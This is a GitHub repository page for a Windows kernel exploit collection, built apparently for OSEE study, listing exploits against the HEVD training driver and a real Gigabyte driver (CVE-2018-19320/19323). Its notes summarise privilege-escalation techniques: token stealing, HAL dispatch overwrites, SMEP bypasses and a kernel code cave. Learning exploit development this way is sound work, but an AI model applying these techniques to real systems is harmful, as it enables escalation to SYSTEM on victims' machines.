Skip to content

xct/windows-kernel-exploits

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Windows-Exploits

Some kernel exploits I used to learn about the topic, mainly for OSEE. These probably contain code snippets from other exploits - if I missed references/authors please send me a message and I'll add them.

Kernel

HEVD

Most exploits are vs. Win10 1909 x64 targetting https://github.com/hacksysteam/HackSysExtremeVulnerableDriver .

  • StackOverflow (Medium Integrity)
  • StackOverflow Data Only (ROP/PreviousMode Overwrite, Medium Intregity)
  • StackOverflow with GS (Medium Integrity)
  • TypeConfusion (Medium Integrity)
  • TypeConfusion with StackPivot (Medium Integrity)
  • User-After-Free (Medium Integrity)
  • Pool Overflow Win7 x64 w ProcessBilled Overwrite (Medium Integrity)
  • NullPtr Dereference Win7 x64 (Medium Integrity)

Misc Drivers

All exploits are vs. Win10 1909 x64.

  • CVE-2018-19320 (Gigabyte Driver, Medium Integrity)
  • CVE-2018-19320 + CVE-2018-19323 (Gigabyte Driver, Low Integrity)

Notes/Misc

  • KUSER_SHARED_DATA, at offset 0x800 (0xFFFFF78000000800) in ntoskrnl.exe contains a writable code cave
  • Ways to SYSTEM: Steal Token, Overwrite HAL Dispatch (or another ptr with a ptr to sc), ACL Editing
  • Ways to get Page RW/RX: Flip bit like with U/S, WriteProcessMemory, VirtualProtect
  • Bypass SMEP: Rop to 20th bit of CR4, Flip U/S, Write Code to Kernel Mem (using U/S trick to fix memory protections)
  • KCFG is only enforced when Hyper-V is enabled (it would prevent ptr overwrites to sc)
  • Dangerous functions to look for in drivers: MmMapIoSpace, __readmsr/__writemsr,memmove
  • Compile Shellcode: nasm shellcode.asm -o shellcode.bin -f bin, radare2 -b 32 -c 'pc' ./shellcode.bin

Resources

About

Some of my windows kernel exploits for learning purposes

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published